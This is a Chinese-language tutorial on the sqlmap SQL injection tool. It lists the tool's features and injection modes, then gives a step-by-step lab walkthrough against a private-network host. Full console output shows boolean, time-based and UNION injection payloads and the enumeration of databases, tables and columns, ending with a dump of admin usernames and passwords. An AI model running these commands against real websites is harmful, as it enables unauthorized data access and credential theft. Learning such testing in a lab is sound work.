sqlmap 学习及漏洞注入

sqlmap简介

 SQLMap是一个开放源码的测试工具，它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎，为最终测试人员提供很多猥琐的功能，可以访问底层的文件系统，可以通过带外连接执行操作系统上的命令。

Sqlmap功能

 sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞。sqlmap的功能强大到让你惊叹，常规注入工具不能绕过的话，终极使用sqlmap会有意想不到的效果。

1、判断可注入的参数

2、判断可以用那种SQL注入技术来注入

3、识别出哪种数据库

4、根据用户选择，读取哪些数据

5、可执行情况

6、当前数据库用户名称和拥有的权限

7、发现WEB虚拟目录

8、上传***getshell

9、绕过防火墙

SQLMap命令选项

归类为目标（Target）选项、请求（Request）选项、优化、注入、检测、技巧（Techniques）、指纹、枚举等。

如果你想观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的，可以使用-v参数。

共有七个等级，默认为1：

0、只显示python错误以及严重的信息。

1、同时显示基本信息和警告信息。（默认）

2、同时显示debug信息。

3、同时显示注入的payload。

4、同时显示HTTP请求。

5、同时显示HTTP响应头。

6、同时显示HTTP响应页面。

如果你想看到sqlmap发送的测试payload最好的等级就是3。

 sqlmap支持的注入模式

1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。

3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。

4、联合查询注入，可以使用union的情况下的注入。（适合用于通过循环直接输出联合查询结果，否则只会显示第一项结果）

5、堆查询注入，可以同时执行多条语句的执行时的注入。

 sqlmap的特性

（1.）sqlmap支持的数据库有：

MySQL,Oracle,PostgreSQL,Microsoft SQL Server,MicrosoftAccess, IBM DB2,SQLite,Firebird,Sybase和SAP MaxDB

（2.）可以提供一个简单的URL，Burp或WebScarab请求日志文件，文本文档中的完整http请求或者Google的搜索，匹配出结果页面，也可以自己定义一个正则来判断那个地址去测试。

（3.）测试GET参数，POST参数，HTTP Cookie参数，HTTP User-Agent头和HTTP Referer头来确认是否有SQL注入，它也可以指定用逗号分隔的列表的具体参数来测试。

（4.）可以设定HTTP(S)请求的并发数，来提高盲注时的效率。

（5.)支持Basic，digest，NTLM ，CA身份验证

（6.)限速：最大并发、延迟发送

（7.)数据库版本、用户、权限、hash枚举和字典破解、暴力破解表列名称

（8.)文件上传下载、UDF、启动并执行存储过程、操作系统命令执行、访问windows注册表

（9.)与w3af、metasploit集成结合使用，基于数据库服务进程提权和上传执行后门。

 

sqlmap注入

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:30:43

[11:30:43] [INFO] resuming back-end DBMS 'mysql' 
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:30:43

从上述输出来看，可以注入，下面正式开始注入。
sqlmap -u '192.168.3.59/article.php?id=1' --dbs，输出是

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:37:43

[11:37:43] [INFO] resuming back-end DBMS 'mysql' 
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:                                                       
[*] information_schema
[*] website

[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:37:43

注入发现两个数据库information_schema和website
information_schema主要是mysql数据库、表、列的信息，没有什么，website是网站的数据，对这个数据库进行注入。
sqlmap -u '192.168.3.59/article.php?id=1 -D website --tables，输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:41:14

[11:41:14] [INFO] resuming back-end DBMS 'mysql' 
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: 'website'
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website                                                              
[2 tables]
+----------+
| admin    |
| articles |
+----------+

[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:41:14

发现有两张表admin、articles，作为攻击者肯定注入admin
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns，输出为 

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:43:46

[11:43:46] [INFO] resuming back-end DBMS 'mysql' 
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: "id","int(11)"
[11:43:47] [INFO] retrieved: "user","text"
[11:43:47] [INFO] retrieved: "pass","text"
Database: website                                                              
Table: admin
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| user   | text    |
| id     | int(11) |
| pass   | text    |
+--------+---------+

[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:43:47

注入得到了三列user、id、pass，只要得到user和pass，就能得到密码(一般是网站后台管理的登录密码)
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump，输出为

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:47:33

[11:47:33] [INFO] resuming back-end DBMS 'mysql' 
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website'
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: "test1","123456"
[11:47:33] [INFO] retrieved: "test2","123456"
[11:47:33] [INFO] retrieved: "test3","123456"
Database: website                                                              
Table: admin
[3 entries]
+--------+--------+
| user   | pass   |
+--------+--------+
| test1  | 123456 |
| test2  | 123456 |
| test3  | 123456 |
+--------+--------+

[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
[11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:47:33

成功得到了管理员账号和密码 

注：学习于https://blog.51cto.com/wt7315/1841241